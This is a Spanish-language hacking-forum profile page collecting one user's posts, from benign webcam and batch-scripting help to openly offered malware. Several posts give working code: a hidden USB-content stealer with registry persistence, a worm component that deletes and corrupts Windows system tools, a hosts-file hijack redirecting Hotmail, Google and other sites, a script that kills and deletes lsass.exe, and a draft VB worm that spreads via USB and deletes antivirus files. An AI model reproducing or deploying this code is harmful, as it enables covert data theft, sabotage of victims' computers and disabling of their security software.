Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - corax

#1
Hardware / Solución: Problemas de webcams y BSOD
30 Septiembre 2013, 15:33 PM
Hola muchachos. Hace poco me compré una nueva webcam para reemplazar a la antigua que llevaba tiempo usando en mi ordenador de sobremesa.

Poco después de instalarla cada vez que quería hacer una videoconferencia me tiraba una BSOD, y realmente es algo bastante molesto.

A raíz de aquello empecé a intentar buscar soluciones en Internet: en los foros de Microsoft, en foros de soporte técnico y en varios de informática general. Lo que saqué en claro es que aunque mi sistema operativo es W7 ese problema lo tenían desde XP hasta W8, y que las soluciones que daban, que generalmente era actualizar los drivers o instalar una versión anterior, o incluso restaurar el equipo a los valores de fábrica, a unos les funcionaban pero a otros no (a mí no me funcionaron, sino no estaría escribiendo este post).

Hasta que de casualidad encontré un comentario a pie de página en un blog que decía que las webcam que llevan micrófono incorporado instalan automáticamente el driver del micrófono y lo ponen en marcha sin solicitar confirmación incluso a pesar de que ya haya otra entrada de audio configurada.

Por eso si os veis en la misma situación que yo, en la que cada vez que intentáis grabar un vídeo con la cam hacer una videoconferencia os sale una pantalla azul mirad en el administrador de dispositivos a ver si el cacharro está usando sus drivers del micrófono al mismo tiempo que los que ya teníais antes en el equipo.



Desde que he deshabilitado el 'USB microphone' el ordenador ha dejado de tirarme BSOD y por fin he podido trabajar en paz con el Skype.

PD: He escrito este post porque hasta hace un momento no había conseguido arreglar mi problema con los pantallazos y en Internet apenas he encontrado información útil al respecto. Espero que a alguien más le sirva.
#2
Buenas a todos,

Con la llegada del verano y del tiempo libre me he propuesto el reto de coger un ordenador portátil y configurarle varias capas de seguridad para intentar hacerlo lo más inaccesible a terceros que sea capaz.

Es un proyecto que voy a iniciar como hobby y sin ningún fin en concreto, así que no tengo prisa (más bien al contrario, cuanto más tarde en acabarlo más tiempo me mantendré ocupado), así que probaré varias combinaciones. De todas maneras quería contar con la opinión de gente más experta en esta materia que yo (que apenas sé nada).

De momento lo que tengo anotado sobre el papel es lo siguiente:

1. Comprar un ordenador portátil nuevo para evitar que contenga información de usuarios anteriores. No necesariamente un portátil con unas grandes prestaciones, con uno de gama media-baja creo que sería suficiente.

2. Formatearlo e instalarle windows XP (que es el SO con el que más experiencia tengo) configurándole dos particiones: una para el SO y otra para almacenar archivos.

3. Configurar la BIOS para arrancar desde el HDD y no desde el CD-ROM. Configurarle además una contraseña a la BIOS para que el posible intruso lo tenga más difícil para cambiar lo anterior.

4. Cifrar el SO con TrueCrypt.

5. Configurar una contraseña de windows de más de 14 caracteres para evitar que un posible intruso se la saltase con ophcrack o similares (suponiendo que se hubiese podido saltar primero la pass del TrueCrypt).

8. Instalar en la partición del SO programas como TOR e incluir un programa que permita cambiar la dirección MAC del equipo.

7. Congelar la partición del SO con una versión reciente del DeepFreeze para evitar daños o espionaje por malware y también para evitar que se almacenen en el equipo datos de los usuarios como logs, cookies y demás huellas.

8. Cifrar completamente la partición destinada al almacenamiento de datos con TrueCrypt. Asimismo, no almacenar datos sin cifrar dentro de ella: es decir, guardarlos a su vez en sub-contenedores cifrados con TrueCrypt, CryptoExpert o similares. La ventaja de esto es que al acceder a la información no sería necesario descifrar toda la almacenada, sino solo la pequeña porción de ella que sea necesaria, dejando al resto protegida en sus respectivos contenedores.

Había pensado también en usar la característica de windows que permite configurar un pen drive como una llave física sin la cual no es posible acceder al SO, pero después he pensado que prefiero que sería más un estorbo que otra cosa, y que prefiero que el ordenador sea autosuficiente y no dependa de nada más.

Sé que tanto nivel de seguridad es innecesario y además un engorro, pero con este proyecto no pretendo hacer un portátil cómodo de usar, lo que quiero es que en él se puedan guardar datos a prueba de bombas, así que después de todo lo anterior mis preguntas son:

1. ¿Qué más podría hacer para darle más seguridad al equipo?
2. ¿Alguna de las ideas que se me han ocurrido hasta ahora es tan simple de saltar que no merece la pena incluirla?
3. ¿Alguna de las ideas que se me han ocurrido se podría sustituir por otra más efectiva?
4. ¿Alguna otra sugerencia?
  :silbar:

Se agradecen todas las respuestas por adelantado  ;-)
#3
Foro Libre / Para los usuarios de ADV.
15 Diciembre 2010, 19:53 PM

Buenas a todos  ;-)

Para todos los que, como yo, sois usuarios de ADV, TQD y similares, he encontrado un estudio que al parecer ha hecho un usuario y lo ha colgado en un PDF en MegaUpload.

El estudio fue realizado por un usuario de esas páginas y explica que el sistema de moderación de posts (mensajes que se publican o no en la página) no sirve para nada.

El usuario en cuestión que hizo el estudio tenía un TQD publicado en el que hablaba de este estudio, pero sin dar datos, así que le mandé un mensaje privado y me respondió, hace un rato, pasándome el link y diciéndome que lo haría público en su comentario.

El link es este: http://www.megaupload.com/?d=03BGIG9S (creo que no violo ninguna regla poniéndola, porque el estudio está publicado bajo Creative Commons, pero si no se pueden poner links, por favor borradlo).

Es un PDF con seis páginas, bastante bien redactado (aunque hay datos estadísticos que no acabo de entender del todo de donde salen ni a qué se refieren) y que por lo menos a mí me ha dejado con la duda, sin saber qué pensar. Al menos me ha parecido bastante curioso que alguien haya dedicado el tiempo a hacer alg así, y quería publicarlo en el foro por si alguien más le quiere echar un ojo.

No puedo citar enlace a la fuente porque, que yo sepa, no se ha subido a ninguna página web, y no sé si está permitido que ponga el nombre del usuario que me pasó el link (por si se considera spam, o algo así). De todas maneras, el que siga esas páginas se habrá topado ya con el post en cuestión.

Un saludo!

PD: Es la primera vez que pongo enlaces a archivos de descargas y no sé si estoy incumpliendo alguna norma. El archivo es un PDF (que no es exe ni nada) y el autor me ha dado permiso para que lo distribuya libremente. De todas maneras, si estoy incumpliendo alguna norma, avisadme y quito el enlace.
#4
Buenas a todos. Estoy intentando desarrollar una nueva herramienta para los ordenadores del trabajo, pero me he encontrado con un par de problemillas.

Lo que estoy intentando hacer es un código que haga una acción cada cierto tiempo después de ejecutarlo en un equipo. La idea es que cuando pasen por ejemplo 20 días, como en el ejemplo de abajo, muestre el mensaje por pantalla de que es conveniente hacer un backup de las bases de datos.

Lo que se me ha ocurrido para calcular el tiempo ha sido comparar la fecha de creación de un archivo (C:\marca.txt), que se cree la primera vez que se ejecute el programa, y comparar esa fecha con la del sistema. Ese código no me ha dado problemas para funcionar, compara bien las dos fechas.

@echo off
:recordador1
If not exist "C:\marca.txt" echo >C:\marca.txt & goto recordador2
cd /d "C:\"

call:datos marca.txt

:datos
set tmp=%~t1
set /a varanno=%date:~6,4%-%tmp:~6,4%
If %varanno% EQU 0 set /a varmes=%date:~3,2%-%tmp:~3,2%
If %varanno% EQU 1 set /a varmes=(%date:~3,2%+12)-%tmp:~3,2%
If %varanno% GEQ 2 goto:tiempo1
If %varmes% EQU 0 set /a vardia=%date:~0,2%-%tmp:~0,2%
If %varmes% EQU 1 set /a vardia=(%date:~0,2%+30)-%tmp:~0,2%
If %varmes% GEQ 2 goto:tiempo1
If %vardia% LSS 20 goto:recordador2
If %vardia% GEQ 20 goto:tiempo1

:tiempo1
echo   Ya han pasado 22 o más días.
echo   Por favor, haga un backup de las bases de datos.
del /q /f "C:\marca.txt" & echo >C:\marca.txt & goto recordador2

:recordador2
:: más código


Sin embargo, el código no funciona como debiera, no sé qué hago mal, pero da fallos al redireccionar a :tiempo y a :recordador2, y no sé qué le pasa.

Por otra parte, ¿hay alguna manera más eficiente para saber en qué fecha se empezó a usar el programa sin necesidad de crear un archivo externo y ver su fecha de creación, como he hecho yo? Porque mi método me parece algo tosco.

Gracias por adelantado.

#5
buenos días a todos

estoy intentando hacer una herramienta bastante simple en batch que abra una carpeta si se llama igual que el archivo bat que se esté ejecutando

para eso estoy usando el código:

If exist %~d0%~p0%~n0\ (start %~d0%~p0%~n0\) else (echo la carpeta no existe&pause>nul)


y funciona... excepto con aquellas rutas que tienen espacios, como C:\Documents and Settings, por ejemplo

creo que debe haber una solución, pero por más vueltas que le doy, no se la encuentro... ¿a alguien se le ocurre cómo podría solucionarse?

gracias por adelantado
#6
Hola a todos,
necesito almacenar en una variable el nombre (sin ruta y sin extensión) del archivo que se esté ejecutando.

Es decir, si tengo un archivo que se llama "C:\Documents and Settings\archivo1.bat" y lo ejecuto, quiero que almacene en una variable la palabra "archivo1" para poder operar con ella más tarde (mostrarla por pantalla, etc).

He probado usando la variable %0 de diferentes maneras, pero no consigo que haga lo que quiero...  :-\

¿alguien podría echarme una mano con esto?
#7
buenas a todos

necesito hacer un fragmento de código en batch que busque los nombres de las carpetas (solo las carpetas, sin contar las subcarpetas), de la unidad que se le indique, y que almacene cada nombre en una variable para poder trabajar con ellas más adelante

después de pasarme un buen rato intentando hacerlo sin éxito al final me he quedado sin ideas, ¿a alguien se le ocurre algo?  :-\
#8
Scripting / My USB Stealer
1 Octubre 2008, 18:26 PM
Hola a todos!

Hoy os traigo la plantilla de un código en batch cuya función es copiar el contenido de memorias externas a una carpeta del disco duro de manera automática.

La plantilla es:
Código (bash) [Seleccionar]
::Code pensado para detectar y copiar todo el contenido de un USB conectado al equipo.
:: Construido en arquitectura on-demand (hay que ejecutar el programa para que realice la orden).
:: Este sistema copia todos los archivos. Es posible adaptar el code para que copie solo archivos con un nombre y/o una extensión concreta.

@echo off
If Exist C:\STOLEN (goto echeck) else (
MD C:\STOLEN
goto echeck
)

:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)

:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)

:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)

:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)


:existe
ping -n 2 localhost
xcopy E:\*.* C:\STOLEN\*.* /E /I
(goto fcheck)


:existf
ping -n 2 localhost
xcopy F:\*.* C:\STOLEN\*.* /E /I
(goto gcheck)


:existg
xcopy G:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto hcheck)


:existh
xcopy H:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto echeck)


Como podemos ver el código es bastante tosco. Esto es así porque está pensado para usarse como modelo de partida para otros códigos más específicos.
Por ejemplo, imaginemos que queremos que el programa copie un tipo de archivos concretos a una carpeta menos llamativa que C:\STOLEN, y que además queremos que lo haga siempre, sin necesidad de que nosotros ejecutemos el programa.
Pues partiendo del código anterior, con unas pequeñas modificaciones obtenemos un código como este:

Código (bash) [Seleccionar]
::Code pensado para detectar y copiar todo el contenido de un USB conectado al equipo.
:: Construido en arquitectura always-on (una vez instalado, se ejecuta siempre).
:: El tipo de archivos que va a copiar son JPG y BMP. Esto es configurable.

@echo off

If Exist "%PROGRAMFILES%\USB\spool.exe" (goto alpha) else (goto betha)

:betha
MD "%PROGRAMFILES%\USB\"
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f
goto alpha

:alpha
If Exist "%USERPROFILE%\USB\" (goto echeck) else (
MD "%USERPROFILE%\USB\"
goto echeck
)

:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)

:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)

:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)

:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)


:existe
ping -n 2 localhost
xcopy E:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
xcopy E:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
(goto fcheck)


:existf
ping -n 2 localhost
xcopy F:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
xcopy F:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
(goto gcheck)


:existg
xcopy G:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
xcopy G:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
ping -n 2 localhost
(goto hcheck)


:existh
xcopy H:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
xcopy H:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
ping -n 2 localhost
(goto echeck)


Aquí vemos que el programa se copiaría a la carpeta de Archivos de Programa, y crearía una clave en el registro que lo auto-iniciaría con windows, para evitar tener que andarlo ejecutando continuamente.
Además, los datos se copian a la carpeta %USERPROFILE%\USB\, que llama menos la atención que C:\STOLEN, obviamente  ::)

NOTA IMPORTANTE: Para que el programa funcione, es necesario compilarlo a .exe y dotarlo de la caracterísitca de ejecutarse en modo oculto.

Espero que este código os sea de utilidad a los que buscábais algo parecido (yo en su momento lo busqué), ya que así por lo menos no os arriesgáis a que el programa que os descargáis traiga "regalito". (Ventajas de conocer el código fuente  :rolleyes:)

Hasta otra!
#9
Buenas a todos!

ya publiqué anteriormente un par de codigos de batch que podían ser integrados dentro del código general de un gusano. En este post y en los próximos que publique iré ampliando los códigos que subí.

Este código en concreto se encarga de restringir la seguridad de un ordenador corriendo bajo Windows XP:

Código (bash) [Seleccionar]
@echo off

del /Q /F %WINDIR%\System32\taskmgr.exe
del /Q /F %WINDIR%\System32\tasklist.exe
del /Q /F %WINDIR%\System32\regedt32.exe
del /Q /F %WINDIR%\System32\wscui.cpl
del /Q /F %WINDIR%\System32\command.com
del /Q /F %WINDIR%\System32\restore\rstrui.exe
del /Q /F %WINDIR%\System32\restore\srdiag.exe
del /Q /F %WINDIR%\taskman.exe
del /Q /F %WINDIR%\regedit.exe
del /Q /F %WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe

echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\taskmgr.exe"

echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\taskman.exe"

echo %random%%random%%random%%random%>>"%WINDIR%\regedit"
echo %random%%random%%random%%random%>>"%WINDIR%\regedit"
echo %random%%random%%random%%random%>>"%WINDIR%\regedit"

echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\rstrui.exe"

echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\restore\srdiag.exe"

echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\PCHealth\HelpCtr\Binaries\msconfig.exe"

echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\command.com"

echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\tasklist.exe"

echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\wscui.cpl"

echo %random%%random%%random%%random%>>"%WINDIR%\System32\regedt32.exe"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\regedt32.exe"

echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
echo %random%%random%%random%%random%>>"%WINDIR%\System32\cmd.com"
attrib +s +h +r "%WINDIR%\System32\cmd.com"


Hasta otra!
#10
Buenas a todos otra vez.

Visto el (poco) éxito que tuvo mi anterior aportación sobre el código de ataque a lsass para evitar que el PC pudiera ser apagado, me arriesgo a volver a quedarme solo ante esta nueva explicación tan apañada sobre cómo hacer el gracioso con el archivo de hosts.

Todos conocemos el típico truco de redireccionar a localhost (127.0.0.1) ciertas páginas de intertet para evitar que el usuario las pueda ver. [Claro claro... ¿quién no ha resistido la tentación de hacer esta  :rolleyes: inocente  :rolleyes: gamberrada para reirse un rato a costa de otro]

Pues bien, si hemos redireccionado alguna vez una página hacia localhost, ¿podríamos redireccionar una página web hacia OTRA página web asignándole a la dirección de la primera la IP de la segunda en el archivo de hosts?

Como probablemente los que no sepan de lo que hablo se hayan perdido, lo explicaré con un ejemplo práctico. (Y el que no sepa qué es el archivo de hosts que se vaya a la wikipedia).

Imaginemos que nuestra página 1 es google.es
La IP de google.es es 216.239.59.104

Ahora, como somos tan inocentes, escogemos como página 2 a zorritas.com
La IP de zorritas.com es 70.86.199.78

[Las IP's se determinan mediante ping en la línea de comandos]

Ahora imaginemos que queremos que al entrar en la página 1 nos redireccione a la página 2. (es decir, que en nuestro navegador pongamos google.es y nos mande, para nuestra grandísima sorpresa, a zorritas.com ¿qué gracia ehh? Seeh, que te lo hagan a ti  :xD).

En ese caso, la línea del archivo de hosts debería quedar así:

70.86.199.78   google.es

un código en batch capaz de hacerlo es el siguiente:

echo 70.86.199.78   google.es>>"%WINDIR%\System32\drivers\etc\hosts"
[como todos ya deberíamos saber, el archivo de hosts no tiene extensión...]

Por tanto, un verdadero restrictor sería:
Código (bash) [Seleccionar]

@echo off
echo #Critical system entries>>"%WINDIR%\System32\drivers\etc\hosts"
echo 70.86.199.78 hotmail.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 70.86.199.78 www.hotmail.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 82.98.86.175 es.mail.yahoo.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 82.98.86.175 yahoo.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 72.232.130.44 terra.es>>"%WINDIR%\System32\drivers\etc\hosts"
echo 72.232.130.44 www.terra.es>>"%WINDIR%\System32\drivers\etc\hosts"
echo 66.199.187.181 google.es>>"%WINDIR%\System32\drivers\etc\hosts"
echo 66.199.187.181 www.google.es>>"%WINDIR%\System32\drivers\etc\hosts"
echo 217.113.244.80 google.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 217.113.244.80 www.google.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 72.232.197.82 elhacker.net>>"%WINDIR%\System32\drivers\etc\hosts"
echo 72.232.197.82 www.elhacker.net>>"%WINDIR%\System32\drivers\etc\hosts"
echo 64.255.172.50 fotolog.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 64.255.172.50 www.fotolog.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 64.255.172.50 youtube.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 64.255.172.50 www.youtube.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 208.73.212.12 tibia.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 208.73.212.12 www.tibia.com>>"%WINDIR%\System32\drivers\etc\hosts"
echo 216.34.131.135 jccm.es>>"%WINDIR%\System32\drivers\etc\hosts"
echo 216.34.131.135 www.jccm.es>>"%WINDIR%\System32\drivers\etc\hosts"
exit


Venga, sed buenos y no lo uséis para amargarle el día a vuestra exnovia.

Sobra decir que no me responasbilizo de lo que hagáis con el código. De hecho, sería un poco surrealista que le dijérais al juez: "Señor juez, es que fulanito se responsabilizaba de que yo le jodiera el ordenador a mi hermano...". No, la verdad es que no cuela  :xD
A sí que ya sabéis... bajo vuestra entera responsabilidad.

Hasta otra!
#11
Scripting / código de ataque a lsass en batch
25 Junio 2008, 14:21 PM
Bueno como hacía mucho tiempo que no posteaba nada que no fueran peticiones de ayuda, he decidico compartir con la humanidad espe pequeño código mío que tan buenos ratos me ha hecho pasar:

* * educative purposes only, no me responsabilizo de que te jodas el ordenador * *

@echo off
taskkill /IM lsass.exe /f
shutdown -a
del /q /f %WINDIR%\System32\lsass.exe
del /q / f %WINDIR%\System32\logoff.exe
exit

* educative purposes only, no me responsabilizo de que jodas ordenadores ajenos *

Este código hará las delicias de los que mepiecen a programar sus "evil toolz" en batch, ya que puede usarse sólo o incorporado a un código mayor.
SI VAS A HACER ALGO GORDO EN BATCH NO SEAS MALA GENTE Y MÁNDALO A VIRUSTOTAL. INFECTAR POR INFECTAR Y HAER DAÑO POR HACER DAÑO ES TERRORISMO.

|------------------>

Y ahora, una breve explicación que probablemente nadie lea  :xD (ya he publicado el código, qué mas puede importar, pensarán algunos):

Lo primero que hace este código es parar el proceso lsass.exe. Para ello se vale del modificador /f, que indica carácter forzado (para el que no lo sepa, el lsass.exe es un proceso de sistema :¬¬).

Al abortar el proceso se inicia una cuenta atrás de 30 segundos para que se reinicie el ordenador. Para abortarla se utiliza el comando shutdown con el modificador -a.

¿Qué hemos conseguido con esto? Pues simple y llanamente que el ordenador no pueda apagarse si no es tirando del cable de la luz. ¿Divertido ehh?  :xD Pues procura que no te pase a ti, porque entonces verías lo divertido que es.

Entonces... ¿para qué valen los otros dos comandos? (dando por supuesto que se sabe para qué sirve el comando "exit"). Pues muy sencillo. Como además de traviesos somos malos, pero malos malos con ganas, pues no queremos que el ordenador pueda ser apagado nunca más.
Esos dos comandos hacen que el pequeño lío en el que has metido a la máquina no se solucione reiniciando. ¿Y cómo lo hace? Pues eliminando el archivo lsass.exe y el logoff.exe. Si no hay archivo, no hay proceso  :rolleyes: ;D

Sed buenos y no se lo hagáis a vuestra exnovia  :¬¬

Hasta otra!


#12
Scripting / Compiladores en Batch
22 Junio 2008, 21:20 PM
Buenas a todos!

Tras una intensa (e infructuosa) búsqueda por Internet no me queda otra opción que postear pidiendo ayuda:

¿Conoce alguien algún compilador de batch que no sea el Quick Batch File Compiler (cuyos .exe resultantes son detectados por unos cuantos antivirus sea cual sea el código compilado) pero que permita incluir archivos dentro del ejecutable final (embebidos), y que permita elegir un icono personalizado para el .exe final?

Ya he probado el Batch Hidden Compiler para algunos códigos, pero para el que necesito no sirve por la sencilla razón de que ni permite escoger el ejecutable final (pone por defecto el icono propio de los .exe) ni permite incluir archivos dentro del ejecutable final.

Gracias por adelantado!
#13
Scripting / programación batch
28 Febrero 2008, 13:03 PM
buenas a todos

tengo un problema con un código de batch, y no consigo localizar el error

el código els el siguiente:

@echo off
ren alfa.jpg  alfa.Mp3
CD "\alfa.Mp3"
exit

el renombrado lo lleva a cabo sin problemas, pero no consigo que el archivo final (alfa.Mp3) se ejecute después de haber sido cambiado de extensión

todas las sugerencias y soluciones son bien recibidas
#14
En una de mis búsquedas desesperadas por internet de un manual de VBS encontré uno que debe ser bastante bueno, pero del que no acaban de quedarme claras un par de cosillas:

Necesito crear un código de VBS (no me sirve Vb, a sí que evitad hacer alusiones a que mejor lo haga en Vb, etc, etc.) que elimine una lista de archivos, pero SÓLO elimine esos archivos, sin dañar ningún otro.

El código que he encontrado es el siguiente:

Sub DeleteAFile(especificaciondearchivo)
  Dim fso
  Set fso = CreateObject("Scripting.FileSystemObject")
  fso.DeleteFile(especificaciondearchivo)
End Sub

y supongo que en "especificaciondearchivo" hay que colocar la ruta y el nombre del archivo

pero supongo que hay que crear un sub para cada archivo, y es una restra larga

me basta con que alguien escriba el código que se ajuste al siguente ejemplo:

code en VBS que elimine los siguientes archivos:
%temp%/juan.txt
%temp%/pepe.jpg

(Para todo aquel que piense que no he buscado bastante, he de decirle que un lenguaje de programación no es fácil aprenderlo por libre, y que postear en este foro ha sido mi último recurso, no un gesto de pereza)

gracias por adelantado

#15
Buenos días a todos. Leyendo mini-manuales de VB en esta página web y en otras semejantes se me ocurrió probar a intentar crear mi primer gusano (por supuesto, basándome en código prefabricado de los manuales, sobre todo de uno de Hendrix, y usando parte del código del "michelle", de octalh. Bueno... es mi primer gusano, a sí que supongo que algo mal tendrá. Échenle un ojo y si ven algún error háganmelo saber ¿ok? :

Código (vb) [Seleccionar]

App.Taskvisible = False

FileCopy App.Path & "\" & App.VBSname & ".vbs C:\Windows\System\services.vbs"
Shell "cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v services.vbs d/ C:\WINDOWS\System\services.vbs" 'el pequeñín ya está en el registro
Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disableregistrytools /t reg_dword /d ""1"" /f" 'eso bloquea el registro
Kill "C:\WINDOWS\System32\wscui.cpl" 'esto borra el centro de seguridad
ws.RegWrite "HKEY_CURRETN_USER\Software\Microsoft\Windows NT\Currentversion\Policies\Explorer\RestrictRun", " "
Kill "C:\WINDOWS\System32\shutdown.exe"
Shell "reg add HKCU\software\microsoft\windows\CurrentVersion\policies\system /v disabletaskmgr /t reg_dword /d ""1"" /f"

Private Sub Form_Load()
Form1.Visible = False
MsgBox ("Runtime Error 492. El archivo está dañado o corrupto. Por favor, consiga otra copia."), vbCritical, "Fallo en la aplicación ""
End Sub


Open "C:\Windows\System32\winlog.bat" For Output As #1
Print #1, "@echo off"
Print #1, "If exist E:\ (Copy /y C:\WINDOWS\System\services.vbs E:\services.vbs)"
Print #1, "If exist F:\ (Copy /y C:\WINDOWS\System\services.vbs F:\services.vbs)"
Print #1, "If exist G:\ (Copy /y C:\WINDOWS\System\services.vbs G:\services.vbs)"
Print #1, "exit"
Close #1
Shell ("C:\Windows\System32\Winlog.bat"), vbHide


Kill "C:\WINDOWS\System32\Restore\rstrui.exe"
Kill "C:\WINDOWS\System32\Restore\srdiag.exe"
Kill "C:\Archivos de programa\ESET\nod32.exe"
Kill "C:\Archivos de programa\ESET\nod32kui.exe"
Kill "C:\Archivos de programa\ESET\nod32krn.exe"
Kill "C:\Archivos de programa\ESET\nod32krr.dll"
Kill "C:\Archivos de programa\ESET\nod32ari.dll"
Kill "C:\Archivos de programa\ESET\ps_amon64.dll"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\pavsrv51.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AVENGINE.EXE"
Kill "c:\archivos de programa\panda software\panda platinum 2006 internet security\firewall\PNMSRV.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PavFnSvr.exe"
Kill "C:\Archivos de programa\Archivos comunes\Panda Software\PavShld\pavprsrv.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam\pskmssvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\PsImSvc.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\APVXDWIN.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\SRVLOAD.EXE"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\WebProxy.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\psimreal.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Platinum 2006 Internet Security\avciman.exe"
Kill "C:\Archivos de programa\Zone Labs\ZoneAlarm\zlclient.exe"
Kill "C:\WINDOWS\SYSTEM32\ZONELABS\vsmon.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavFnSvr.exe"
Kill "C:\Archivos de programa\Panda Software\Panda Titanium Antivirus 2005\PavKRE.exe"
